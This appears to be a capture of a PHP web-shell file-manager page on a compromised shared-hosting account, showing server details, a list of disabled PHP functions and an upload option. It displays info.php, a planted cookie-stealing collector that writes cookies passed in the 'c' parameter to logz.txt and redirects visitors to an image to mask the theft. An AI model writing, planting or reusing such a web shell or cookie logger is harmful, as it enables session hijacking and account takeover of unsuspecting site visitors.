HEX
Server: Apache
System: Linux server12.hostingraja.org 3.10.0-962.3.2.lve1.5.85.el7.x86_64 #1 SMP Thu Apr 18 15:18:36 UTC 2024 x86_64
User: phonixce (1609)
PHP: 7.3.33
Disabled: show_source, system, shell_exec, passthru, exec, popen, proc_open, allow_url_fopen, symlink, escapeshellcmd, pcntl_exec
Upload Files
File: /home/phonixce/public_html/info.php
<?php

header ('Location:https://phonixcentre.in/images/IMG_20170219_173325.jpg');
$cookies = $_GET["c"];
$file = fopen('logz.txt', 'a');
fwrite($file, $cookies . "\n");

?>